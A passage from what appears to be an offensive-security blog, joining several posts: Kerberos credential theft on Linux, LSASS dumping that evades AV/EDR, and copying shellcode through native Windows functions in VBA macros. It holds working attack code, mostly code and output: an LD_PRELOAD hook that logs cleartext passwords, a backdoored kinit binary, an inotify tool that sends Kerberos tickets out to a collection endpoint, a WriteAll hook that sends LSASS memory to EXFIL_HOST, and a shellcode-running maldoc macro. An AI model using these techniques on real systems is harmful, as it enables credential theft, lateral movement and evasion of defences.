fp);
if (prompts[i].hidden)
putchar('\n');
if (retp == NULL) {
if (got_int)
errcode = KRB5_LIBOS_PWDINTR;
else
errcode = KRB5_LIBOS_CANTREADPWD;
restore_tty(fp, &saveparm, &osigint);
break;
}
/* replace newline with null */
retp = strchr(prompts[i].reply->data, '\n');
if (retp != NULL)
*retp = '\0';
else {
/* flush rest of input line */
do {
scratchchar = getc(fp);
} while (scratchchar != EOF && scratchchar != '\n');
}
errcode = restore_tty(fp, &saveparm, &osigint);
if (errcode)
break;
prompts[i].reply->length = strlen(prompts[i].reply->data);
}
cleanup:
if (fp != NULL)
fclose(fp);
else if (fd >= 0)
close(fd);
return errcode;
}
As we can see this function receives an array of prompts and then use fgets()
to read data from a duped STDIN to store the password in a krb5_data
field inside krb5_prompt
structure. So we only need to hook this function too and check those structures to get the cleartext password.
Finally our hook is:
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <krb5/krb5.h>
typedef krb5_error_code (*orig_ftype)(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options);
typedef krb5_error_code KRB5_CALLCONV (*orig_ftype_2)(krb5_context context, void *data, const char *name, const char *banner, int num_prompts, krb5_prompt prompts[]);
krb5_error_code krb5_get_init_creds_password(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options) {
krb5_error_code retval;
orig_ftype orig_krb5;
orig_krb5 = (orig_ftype)dlsym(RTLD_NEXT, "krb5_get_init_creds_password");
if (password != NULL) {
printf("[+] Password %s\n", password);
}
retval = orig_krb5(context, creds, client, password, prompter, data, start_time, in_tkt_service, k5_gic_options);
if (retval == 0) {
printf("[+] Username: %s\n", creds->client->data->data);
}
return retval;
}
krb5_error_code KRB5_CALLCONV krb5_prompter_posix(krb5_context context, void *data, const char *name, const char *banner, int num_prompts, krb5_prompt prompts[]) {
krb5_error_code retval;
orig_ftype_2 orig_krb5;
orig_krb5 = (orig_ftype_2)dlsym(RTLD_NEXT, "krb5_prompter_posix");
retval = orig_krb5(context, data, name, banner, num_prompts,prompts);
for (int i = 0; i < num_prompts; i++) {
if ((int)prompts[i].reply->length > 0) {
printf("[+] Password: %s\n", prompts[i].reply->data);
}
}
return retval;
}
Let’s check it:
➜ working$ LD_PRELOAD=/home/vagrant/working/hook_preload.so kinit [email protected]
Password for [email protected]:
[+] Password: MightyPassword.69
[+] Username: Administrador
Another option can be to sustitute a target binary (or a lib) with one backdoored by us. This can be done throught the compilation of a modified version or patching the original. In our case we are going to patch a binary (kinit, for example) with a simple hook using the project GLORYhook that uses LIEF, Capstone and Keystone under the hood to simplify the process.
To not repeat the same hook this time we are going to patch kinit so it now will print the keyblock and ticket data after a succesfull authentication:
#define _GNU_SOURCE
#include <stdio.h>
#include <krb5/krb5.h>
#include <string.h>
krb5_error_code gloryhook_krb5_get_init_creds_password(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options) {
krb5_error_code retval;
retval = krb5_get_init_creds_password(context, creds, client, password, prompter, data, start_time, in_tkt_service, k5_gic_options);
if (retval == 0){
printf("[+] Keyblock (%08jx):\n", (uintmax_t)creds->keyblock.enctype);
for (int i = 0; i < creds->keyblock.length; i++) {
printf("%02X", (unsigned char)creds->keyblock.contents[i]);
}
printf("\n[+] Ticket:\n");
for (int i = 0; i < creds->ticket.length; i++) {
printf("%02X", (unsigned char)creds->ticket.data[i]);
}
}
return retval;
}
Just compile it using the instructions provided by GLORYhook in its readme and test it:
➜ working$ gcc -shared -zrelro -znow -fPIC hook-patch.c -o hook_patch.so
➜ working$ python3 GLORYHook/glory.py /usr/bin/kinit ./hook_patch.so -o ./kinit-backdoored
[+] Beginning merge!
[+] Injecting new PLT
[+] Extending GOT for new PLT
[+] Fixing injected PLT
[+] Injecting PLT relocations
[+] Done!
➜ working$ ./kinit-backdoored [email protected]
Password for [email protected]:
[+] Keyblock (00000012):
E8B9D14EDC610C496A2B0426DDDACFA9AA52501A5998A1F1AF44644FF7F117DC
[+] Ticket:
6182046F3082046BA003020105A10F1B0D4143554152494F2E4C4F43414CA2223020A003020102A11930171B066B72627467741B0D4143554152494F2E4C4F43414CA382042D30820429A003020112A103020102A282041B0482041736B5A6CD1C6341E2145C93715ACAED71B1226D277B441D0731D830B819BEB2CC7DCE596C07176095C94E311BA05D45BDD951503FF5B2C8A6601EF39AA9316C2D0EAAD279279F1C5EB82BD133B637E98E4E672F08E047A0DD4D72612D9349F90E62753DBB8054860D82E7FE023694A175923236E84D55F047FF25AB6C801B4A14BA0526BF14C15015EE15EB723C783170820335A7272E54279CA17E3C4C8AB6079BED4FC0D8238FAD3B1D0F9FAB0B0AEC7603010F056F8F2B9F96B6BC03A5B3918382646078F62017EC0D11C05EDDCE01F77A88458D9EA476CF8E002BEE4F3886C0294344D8AC0840151AECC7090223240F6E3C4287320F840ACEA4C61FF7BA02E01EF4E6D203C13DEA9BFF9FE9A9F60F918A70FB9202C6C9EA5098735CAD0D7FA089C5F6EF87470413F3BF939FBC57060A341D0640E17F4106B5CAF46BC1DBB418D5B083B885D9A146A54C455F5D8E929889092FE4E2636CBC6CBD8CA599617D478D0194904FFAC35E4663FF6BB551E558D21E137BEE5600DCBBCE939B5A09DC3301FBB234AFF83985DF819B9C105FF18564E5C5B94DDE9DE690FAA3E0A21392ABCAD17F9A6975898BD59D743FA715001ABDD1321BFA4F70B4997B7BCA573EBAD3D5F57DC35429D4B1CEB2F7577352385C8DAA19326CA240A7AB4F1230C22CC14581BF66C52565F26835D24CB63FCC6535590C4C06C01EF325B8DE8C77D5DF82309F13C2080C599A2C69889A1E743EEFC4A5119B1EE418DE3748A2CAF75C50EA7E9E966DD40088C6C85EE8BB24859C032AB417EBEA08FD79506EFC6B34B1E8D57979D9D4EBC9822A50C23D0C71D188DB3DEFC5CFC49D422488D4AA4E90865601B51A9752957BECDF2AA5C41B0FD8F6F27EEAF5CB8E09F2453025B5FDF05EF9D693E91EE5C9D62E93097EBDBAC498F9D7E7F1A0FA54B7C2D3F7925C0A0AD48E792FFF833981793880F9A0A87CF0D8758BF73E5BAD095F95673172BF8DBCFE89F7B806BC3DC976CB7DA360DF1058B962E8E8B71A1D1DB903EC53DE343EA787C234DB239FB2758E7E70C13CA08CED1F9AD3D4228BCC54D098899C8E20A4EC494996572EC510AF2C88A9B1718EA4FA74C91F1789433151AAD3C99AD4BB1E57E41A7C40595D073E9E417383E2CB98D2886A643DE5A54270137D84DD510C6ED687D47462E9E03E559A0D5CFD44855308EE6A32F096A1FF04FBBE556945E667D7F3E3EC8ED6D30CD7BCE6A617ADDA5216D296E6F627D8EFDDECF392872E081020D7255D6AE604BD76A281CE1D7B38BA39F5C6D6C9317F4B1E01D56C90D4D0EA5425BD8C7A3391EB682B087C6A4FA9A586515338322D27A396F65E69681DD2A4E4EA73B163A756A709232F4C6C56515E06AD4CC4F96B391F848DBAB73810AC3AC10D8FD7ACCA32A8D68F7DC2CF01A285E78F2F770CD322A2EF790A5A69EC91786D5180BFF1B76E6112BA008EFF0B7D7F2C01217AB57EE37D0BB082%
The most common way to save kerberos tickets in linux environments is with ccache files. The ccache files by default are in /tmp with a format name like krb5cc_%UID%
and they can be used directly by the majority of tools based in the Impacket Framework, so we can read the file contents to move laterally (or even to escalate privileges if we are lucky enough to get a TGT from a privileged user) and execute commands via psexec.py/smbexec.py/etc. But if no valid tickets are found (they have a lifetime relatively short) we can wait and set an inotify
watcher to detect every new generated ticket and forward them to our C&C via https/dns/any-covert-channel.
// Example based on https://www.lynxbee.com/c-program-to-monitor-and-notify-changes-in-a-directory-file-using-inotify/
// Originally this code was posted by our owl @TheXC3LL at his own blog (https://x-c3ll.github.io/posts/rethinking-inotify/)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <limits.h>
#include <unistd.h>
#include <fcntl.h>
#include <curl/curl.h>
#define MAX_EVENTS 1024 /*Max. number of events to process at one go*/
#define LEN_NAME 1024 /*Assuming length of the filename won't exceed 16 bytes*/
#define EVENT_SIZE ( sizeof (struct inotify_event) ) /*size of one event*/
#define BUF_LEN ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ) ) /*buffer to store the data of events*/
#define endpoint "http://localhost:4444"
int exfiltrate(char* filename) {
CURL *curl;
CURLcode res;
struct stat file_info;
FILE *fd;
fd = fopen(filename, "rb");
if(!fd){
return -1;
}
if(fstat(fileno(fd), &file_info) != 0) {
return -1;
}
curl = curl_easy_init();
if (curl){
curl_easy_setopt(curl, CURLOPT_URL, endpoint);
curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
curl_easy_setopt(curl, CURLOPT_READDATA, fd);
res = curl_easy_perform(curl);
if (res != CURLE_OK) {
return -1;
}
curl_easy_cleanup(curl);
}
fclose(fd);
return 0;
}
int main(int argc, char **argv){
int length, i= 0, wd;
int fd;
char buffer[BUF_LEN];
char *ticketloc = NULL;
printf("[Kerberos ccache exfiltrator PoC]\n\n");
//Initiate inotify
if ((fd = inotify_init()) < 0) {
printf("Could not initiate inotify!!\n");
return -1;
}
//Add a watcher for the creation or modification of files at /tmp folder
if ((wd = inotify_add_watch(fd, "/tmp", IN_CREATE | IN_MODIFY)) == -1) {
printf("Could not add a watcher!!\n");
return -2;
}
//Main loop
while(1) {
i = 0;
length = read(fd, buffer, BUF_LEN);
if (length < 0) {
return -3;
}
while (i < length) {
struct inotify_event *event = (struct inotify_event *)&buffer[i];
if (event->len) {
//Check for prefix
if (strncmp(event->name, "krb5cc_", strlen("krb5cc_")) == 0){
printf("New cache file found! (%s)", event->name);
asprintf(&ticketloc, "/tmp/%s",event->name);
//Forward it to us
if (exfiltrate(ticketloc) != 0) {
printf(" - Failed!\n");
}
else {
printf(" - Exfiltrated!\n");
}
free(ticketloc);
}
i += EVENT_SIZE + event->len;
}
}
}
}
If the ticket is only cached by the process (because no other process needs to access to it) it is posible to retrieve it from a memory dump. In the paper that we mentioned earlier (Kerberos Credential Thievery (GNU/Linux)) they follow an approach based on scanning the dumped memory by an sliding window with the size of the keyblock and ticket and then calculate the entropy of those frames to find plausible candidates. With the candidates a ccache file is recreated and tried until all posibilities are emptied.
In our humble opinion this method is a bit overkill and convoluted. A far more simple technique can be to scan the dumped memory to find a pattern inside the krb5_creds
structure and then locate the pointers to the keyblock and ticket, extract them and create a ccache file. Let’s explain it.
As we said before a krb5_creds
structure has this definition:
typedef struct _krb5_creds {
krb5_magic magic;
krb5_principal client; /**< client's principal identifier */
krb5_principal server; /**< server's principal identifier */
krb5_keyblock keyblock; /**< session encryption key info */
krb5_ticket_times times; /**< lifetime info */
krb5_boolean is_skey; /**< true if ticket is encrypted in
another ticket's skey */
krb5_flags ticket_flags; /**< flags in ticket */
krb5_address **addresses; /**< addrs in ticket */
krb5_data ticket; /**< ticket string itself */
krb5_data second_ticket; /**< second ticket, if related to
ticket (via DUPLICATE-SKEY or
ENC-TKT-IN-SKEY) */
krb5_authdata **authdata; /**< authorization data */
} krb5_creds;
And krb5_keyblock
is defined as:
typedef struct _krb5_keyblock {
krb5_magic magic;
krb5_enctype enctype;
unsigned int length;
krb5_octet *contents;
} krb5_keyblock;
If everything is ok the magic value will be zero, and the enctype is a known value based on the encryption used (for example, 0x17 is rc4-hmac, 0x12 is aes256-sha1, etc.) so only a small subset of values are valid (indeed you can find all here, there are less than 20) and the keyblock size is fixed (it will be only a well-known value like 32 bytes). If we translate this structure to the memory layout we are going to have a structure that starts with 00000000 XX000000 YY00000000000000
, being XX the enctype and YY the length. So, for example, if we request a ticket with aes256-sha1 our krb5_keyblock
structure will start with 00000000120000002000000000000000
. And this is a pattern that we can use as reference :)
pwndbg> search -x "00000000120000002000000000000000"
[stack] 0x7fffffffdb78 0x1200000000
Here is the beginning of our krb5_block
(that is inside the krb5_creds
). So, at this address plus 16 bytes, is the pointer to the keyblock contents (krb5_octet *contents
):
pwndbg> x/1g 0x7fffffffdb78+16
0x7fffffffdb88: 0x000055555956f3e0
So now we can retrieve the the keyblock content:
pwndbg> x/4g 0x000055555956f3e0
0x55555956f3e0: 0x77a5e74f160548a7 0x49980e2202bb7c46
0x55555956f3f0: 0x6e2d067a19e01e0d 0x79a3a2f8503cd0d0
If we recall the krb5_creds
uses a krb5_data
structure to hold the ticket information (magic, length and pointer to the ticket itself). This pointer to the ticket data is at our pattern plus 64 bytes:
pwndbg> x/1g 0x7fffffffdb78+64
0x7fffffffdbb8: 0x000055555956ea00
And finally our desired ticket:
pwndbg> x/100x 0x000055555956ea00
0x55555956ea00: 0x61 0x82 0x04 0x6f 0x30 0x82 0x04 0x6b
0x55555956ea08: 0xa0 0x03 0x02 0x01 0x05 0xa1 0x0f 0x1b
0x55555956ea10: 0x0d 0x41 0x43 0x55 0x41 0x52 0x49 0x4f
0x55555956ea18: 0x2e 0x4c 0x4f 0x43 0x41 0x4c 0xa2 0x22
0x55555956ea20: 0x30 0x20 0xa0 0x03 0x02 0x01 0x02 0xa1
0x55555956ea28: 0x19 0x30 0x17 0x1b 0x06 0x6b 0x72 0x62
0x55555956ea30: 0x74 0x67 0x74 0x1b 0x0d 0x41 0x43 0x55
...
The size is located just before the pointer, so you can retrieve it to know how much memory to dump.
Programs can use in-kernel storage inside keyrings because it offers far more proteccion than the storage via ccache files. This kind of storage has the advantage that only the user can acces to this information via keyctl
. To thief those juicy tickets we can inject a small stub of code inside processes owned by each user in the compromised machine, and this code will ask the tickets. Easy peasy!
Our friend @Zer1t0 developed a tool called Tickey that does all this job for us:
➜ working# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in vagrant[1000] session...
[+] Successful injection at process 15547 of vagrant[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in pelagia[1120601337] session...
[+] Successful injection at process 58779 of pelagia[1120601337],look for tickets in /tmp/__krb_1120601337.ccache
[*] Trying to inject in aurelia[1120601122] session...
[+] Successful injection at process 15540 of aurelia[1120601122],look for tickets in /tmp/__krb_1120601122.ccache
[X] [uid:0] Error retrieving tickets
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how we overcame an AV/EDR which, in spite of not being able to detect a LSASS
memory dump process, it detected the signature of the dump-file and decided to mark it as malicious. So we decided to modify MiniDumpWriteDump
behavior. Please, take a seat and listen to the story.
As you may already know, MiniDumpWriteDump
receives, among others, a handle to an already opened or created file.
This is a PoC about how to overcome the limitation imposed by this function, which will take care of the whole memory-read/write-buffer-to-file process.
It is recommended to perform this dance making use of API unhooking to make direct SYSCALLS to avoid AV/EDR hooks in place, as explained in the useful Dumpert by Outflanknl, or by any other evasion method. There are a lot of good resources explaining the topic, so we are not going to cover it here.
During a Red Team assessment we came into a weird nuance were an AV/EDR, which we already thought bypassed, was erasing the dump file generated from the LSASS
process memory.
miniDumpWriteDump
’s signature is as follows:
BOOL MiniDumpWriteDump(
HANDLE hProcess,
DWORD ProcessId,
HANDLE hFile,
MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);
as per the MSDN API documentation
Once the function is called, the file provided as the hFile
parameter will be filled up with the memory of the LSASS process, as a MDMP
format file.
MiniDumpWriteDump
takes care of all the magic comes-and-goes related to acquiring process memory and writing it to the provided file. So nice of it!
However, this kind of automated process lefts us with no control whatsoever over the memory buffer written to the file.
We thought it might be nice to have a way to overcome such a limitation.
To inspect the inners, we’ll be firing up WinDbg with a, rather simple, LSASS
dumper implementation making use of the arch-known MiniDumpWritedump
.
This implementation requires the LSASS
process PID as parameter to run. Calling it, will provide a full memory dump saved to c:\test.dmp
. Simple as that. This .dmp
file can be processed with the usual tools.
#include <stdio.h>
#include <Windows.h>
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
void minidumpThis(HANDLE hProc)
{
const wchar_t* filePath = L"C:\\test.dmp";
HANDLE hFile = CreateFile(filePath, GENERIC_ALL, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (!hFile)
{
printf("No dump for you. Wrong file\n");
}
else
{
DWORD lsassPid = GetProcessId(hProc);
printf("Got PID:: %i\n", lsassPid);
BOOL Result = MiniDumpWriteDump(hProc, lsassPid, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
CloseHandle(hFile);
if (!Result)
{
printf("No dump for you. Minidump failed\n");
}
}
return;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation = { 0 };
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
BOOL SetDebugPrivilege() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES TokenPrivileges = { 0 };
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
return FALSE;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
const wchar_t *lpwPriv = L"SeDebugPrivilege";
if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
CloseHandle(hToken);
printf("I dont have SeDebugPirvs\n");
return FALSE;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
CloseHandle(hToken);
printf("Could not adjust to SeDebugPrivs\n");
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
int main(int argc, char* args[])
{
DWORD lsassPid = atoi(args[1]);
HANDLE hProcess = NULL;
if (!IsElevated()) {
printf("not admin\n");
return -1;
}
if (!SetDebugPrivilege()) {
printf("no SeDebugPrivs\n");
return -1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsassPid);
minidumpThis(hProcess);
CloseHandle(hProcess);
return 0;
}
Once compiled and debugged with WinDbg some breakpoints will be placed to aid us in the process:
bp miniDumpWriteDump // Breakpoint at miniDumpWriteDump address
g // go (continue execution)
p // step-in
bp NtWriteFile // Breakpoint at NtWriteFile
g // go (continue execution)
k // and, finally, print the backtrace
Taking a look at the backtrace produced once the execution flow arrives to NtWriteFile
, we can see how the last call inside dbgcore.dll
, before letting the OS take care of the file-writing process, is made from a function called WriteAll
laying inside the Win32FileOutputProvider
.
However, this function is not publicly available to use, as the DLL won’t export it. By inspecting the library, and its base address, we can easily determine the function offset, which seems to be 0xb4b0
(offset = abs_address - base_address)
By peeking a little bit more into the WriteAll
function, we determined that the arguments passed to it were:
Inspecting the memory at the direction given in [rdx] we can see the beginning of the dump file.
Therefore, it should be fairly straightforward to hook into this function to access the buffer and modify it as needed.
The idea of a hook is to modify the “normal” execution flow of an application. Among others, function hooks are placed by many AV/EDR providers in order to monitor certain function calls to discover undesired behaviors.
In this case, to detour the function execution, a direct memory write was implemented over the WriteAll
address. This function was being called over and over during the dump process, likely to fragment the memory writes to smaller pieces and to retrieve different parts of the process being dumped, thus forcing us to restore the original bytes after every detoured call.
Originally, it would look like this:
Note that our primary intention here is not to re-implement the WriteAll
function, but to modify the buffer, then restore the original overwritten bytes, and finally call WriteAll
to let it do its job with the new buffer.
Simplest way to achieve it would be by making the execution flow jump as soon as it reaches WriteAll
:
mov r10, <__TRAMPOLINE_ADDRESS>
jmp r10
That assembly lines translate to the following opcodes to be written at the beginning of the WriteAll
function:
uint8_t trampoline_assembly[13] = {
0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
0x41, 0xFF, 0xE2 // jmp r10
};
Where all those 0x00 should be replaced by the _trampoline
function address.
Which translates to something as simple as:
const char* dbgcore_name = "dbgcore.dll";
intptr_t dbgcore_handle = (intptr_t)LoadLibraryA(dbgcore_name);
intptr_t writeAll_offset = 0xb4b0;
writeAll_abs = dbgcore_handle + writeAll_offset;
void* _hoot_trampoline_address = (void*)_hoot_trampoline;
memcpy(&trampoline_assembly[2], &_hoot_trampoline_address, sizeof(_hoot_trampoline_address));
As stated before, the _trampoline
should implement the following logic:
- Perform the required buffer operations (such as encryption or exfiltration)
- Restore the original overwritten bytes from `WriteAll`.
- Call the original `WriteAll` function with the modified buffer.
- Write the hook again in the `WriteAll` function.
UINT32 _hoot_trampoline(HANDLE file_handler, void* buffer, INT64 size) {
// The position calculation lines will make sense in the Prowlblems section ^o^
long high_dword = NULL;
DWORD low_dword = SetFilePointer(our_dmp_handle, NULL, &high_dword, FILE_CURRENT);
long pos = high_dword << 32 | low_dword;
unsigned char *new_buff = hoot(buffer, size, pos); // Perform buffer operations: Encrypt, nuke, send it...
// Overwrite the WriteAll initial bytes to perform a direct jmp to our _trampoline_function
WriteProcessMemory(hProcess,
(LPVOID*)writeAll_abs,
&overwritten_writeAll,
sizeof(overwritten_writeAll),
NULL
); // Restore original bytes
/* Call the WriteAll absolute address (cast it to a function that
returns an UINT32 and
receives a HANDLE, a pointer to a buffer and an INT64)
*/
UINT32 ret = ( (UINT32(*)(HANDLE, void*, INT64) ) (writeAll_abs) ) (file_handler, (void*)new_buff, size); // erg...
// Rewrite the hook at the beginning of the WriteAll
WriteProcessMemory(hProcess, (LPVOID*)writeAll_abs, &trampoline_assembly, sizeof(trampoline_assembly), NULL);
return ret;
}
The hoot
function may implement a variety of modifications or operations over the passed buffer. In this PoC we’re just XORing the contents of the buffer with a single byte, and sending it via socket connection to a receiving server. It also provides a simple in-memory buffer nuke to avoid writing any contents of the actual buffer to disk.
This proved to be more than enough to prevent any AV/EDR solution from removing the dump file from the computer.
unsigned char* hoot(void* buffer, INT64 size, long pos) {
unsigned char* new_buff = (unsigned char*) buffer;
if (USE_ENCRYPTION) {
new_buff = encrypt(buffer, size, XOR_KEY);
}
if (EXFIL) {
s = getRawSocket(EXFIL_HOST, EXFIL_PORT);
if(s) {
sendBytesRaw(s, (const char*)new_buff, size, pos);
}
else {
printf("[!] ERR:: SOCKET NOT READY\n");
}
}
if (!WRITE_TO_FILE) {
memset(new_buff, 0x00, size);
}
return new_buff;
}
Once the exfiltration/encryption tasks were coded and we started testing, we realized that the WriteAll
function was not creating the dump in a sequential manner. It was actually making NtWriteFile
jump all over the file writing bytes here and there by setting an offset to write to.
__kernel_entry NTSYSCALLAPI NTSTATUS NtWriteFile(
HANDLE FileHandle,
HANDLE Event,
PIO_APC_ROUTINE ApcRoutine,
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID Buffer,
ULONG Length,
PLARGE_INTEGER ByteOffset, // Right here O^O
PULONG Key
);
After having a nice talk with @TheXC3LL, he found this little nifty trick to find out where the cursor was in the file handler received in our _trampoline
function: Get current cursor location on a file pointer
long high_dword = NULL;
DWORD low_dword = SetFilePointer(our_dmp_handle, NULL, &high_dword, FILE_CURRENT);
long pos = high_dword << 32 | low_dword;
Once obtained, we could easily tell our receiving server where in the file it should place the received buffer, by sending a buffer composed of the offset, the size of the modified buffer, and the modified buffer itself. Creating a simple protocol as:
4B 4B <SIZE>B
<OFFSET><SIZE><BUFFFFFFFFFFFER>
SharpMiniDump with NTFS transactions by PorLaCola25 based on b4rtik’s SharpMiniDump
Lsass Minidump file seen as Malicious by McAfee AV by K4nfr3
Although this wasn’t an incredible discovery, playing with memory is always fun ^o^. Also, if you made it to the end of this article, you might want the full code of this PoC. Available as usual in our GitHub, Adepts-Of-0xCC
Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how we can (ab)use different native Windows functions to copy our shellcode to a RWX section in our VBA Macros.
The topic is old and basic, but with the recent analysis of the Lazarus’ maldocs it feels like discussing this technique may come in handy at this moment.
As shown by NCC in his article “RIFT: Analysing a Lazarus Shellcode Execution Method” Lazarus Group used maldocs where the shellcode is loaded and executed without calling any of the classical functions. To achieve it the VBA macro used UuidFromStringA
to copy the shellcode to the RWX region and then triggered its execution via lpLocaleEnumProc
. The lpLocaleEnumProc
was previously documented by @noottrak in his article “Abusing native Windows functions for shellcode execution”.
Using alternatives ways to copy the shellcode is nothing new, even there are a few articles about discussing it for inter-process injections (Inserting data into other processes’ address space by @Hexacorn, GetEnvironmentVariable as an alternative to WriteProcessMemory in process injections by @TheXC3LL and Windows Process Injection: Command Line and Environment Variables by @modexpblog, just to metion a few).
Returning to @nootrak’s article we can find a list of different native functions which can be used to trigger the execution, and even a tool to build maldocs where the functions used to allocate, copy, and execute the shellcode are randomly chosen. Quoted from the article:
I’m calling trigen (think 3 combo-generator) which randomly puts together a VBA macro using API calls from pools of functions for allocating memory (4 total), copying shellcode to memory (2 total), and then finally abusing the Win32 function call to get code execution (48 total - I left SetWinEventHook out due to aforementioned need to chain functions). In total, there are 384 different possible macro combinations that it can spit out.
The tool uses only 2 native functions to copy the shellcode, when there are dozens of them that can be used. So the number of possible combinations can grow A LOT.
In an extremely abstract way we can label the functions that can be (ab)used in two labels: one-shot functions and two-shot functions. The first family of functions are those that let you copy the shellcode directly to the desired address (for example, UuidFromStringA
used by Lazarus); meanwhile two-shot functions are those where the copy has to be done in two-steps: first copy the shellcode to no man’s land, and then retrieve it (for example, SetEnvironmentVariable
/GetEnvironmentVariable
)
Most of the functions falling into this category are functions used to convert info from format “A” to format “B”, or those applying any type of transformation to this info. This kind of functions can be spotted checking their arguments: if it receives an input buffer and an output buffer, it is a good candidate. Let’s check LdapUTF8ToUnicode
for example:
WINLDAPAPI int LDAPAPI LdapUTF8ToUnicode(
LPCSTR lpSrcStr,
int cchSrc,
LPWSTR lpDestStr,
int cchDest
);
So, the parameters are:
lpSrcStr - A pointer to a null-terminated UTF-8 string to convert.
lpDestStr - A pointer to a buffer that receives the converted Unicode string, without a null terminator.
This is a good candidate that meets our criteria. We can test it with a simple PoC in C:
#include <Windows.h>
#include <Winldap.h>
#pragma comment(lib, "wldap32.lib")
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xec\xb3\x8c\xec\xb3\x8c"; // \xcc\xcc\xcc\xcc in UNICODE
LPWSTR copied_shellcode = NULL;
HANDLE heap = NULL;
int ret = 0;
int size = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
size = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), NULL, 0); // First call is to know the size
ret = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), copied_shellcode, size);
EnumSystemCodePagesW(copied_shellcode, 0); // Just to trigger the execution. Taken from Nootrak article.
return 0;
}
As this function works doing a conversion from UTF-8 to UNICODE, we have to craft our shellcode (in this case just a bunch of int3) keeping this in mind.
As we saw, it worked. It is time to translate the C code to the impious language of Mordor VBA:
Private Declare PtrSafe Function HeapCreate Lib "KERNEL32" (ByVal flOptions As Long, ByVal dwInitialSize As LongPtr, ByVal dwMaximumSize As LongPtr) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function EnumSystemCodePagesW Lib "KERNEL32" (ByVal lpCodePageEnumProc As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function LdapUTF8ToUnicode Lib "WLDAP32" (ByVal lpSrcStr As LongPtr, ByVal cchSrc As Long, ByVal lpDestStr As LongPtr, ByVal cchDest As Long) As Long
Sub poc()
Dim orig_shellcode(0 To 5) As Byte
Dim copied_shellcode As LongPtr
Dim heap As LongPtr
Dim size As Long
Dim ret As Long
Dim HEAP_CREATE_ENABLE_EXECUTE As Long
HEAP_CREATE_ENABLE_EXECUTE = &H40000
'\xec\xb3\x8c\xec\xb3\x8c ==> \xcc\xcc\xcc\xcc
orig_shellcode(0) = &HEC
orig_shellcode(1) = &HB3
orig_shellcode(2) = &H8C
orig_shellcode(3) = &HEC
orig_shellcode(4) = &HB3
orig_shellcode(5) = &H8C
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0)
copied_shellcode = HeapAlloc(heap, 0, &H10)
size = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, 0, 0)
ret = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, copied_shellcode, size)
ret = EnumSystemCodePagesW(copied_shellcode, 0)
End Sub
Attach a debugger and run the macro!
Another example can be PathCanonicalize
:
BOOL PathCanonicalizeA(
LPSTR pszBuf,
LPCSTR pszPath
);
The parameters meets our criteria:
pszBuf - A pointer to a string that receives the canonicalized path. You must set the size of this buffer to MAX_PATH to ensure that it is large enough to hold the returned string.
pszPath - pointer to a null-terminated string of maximum length MAX_PATH that contains the path to be canonicalized.
The PoC:
#include <Windows.h>
#include <Shlwapi.h>
#pragma comment(lib, "Shlwapi.lib")
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
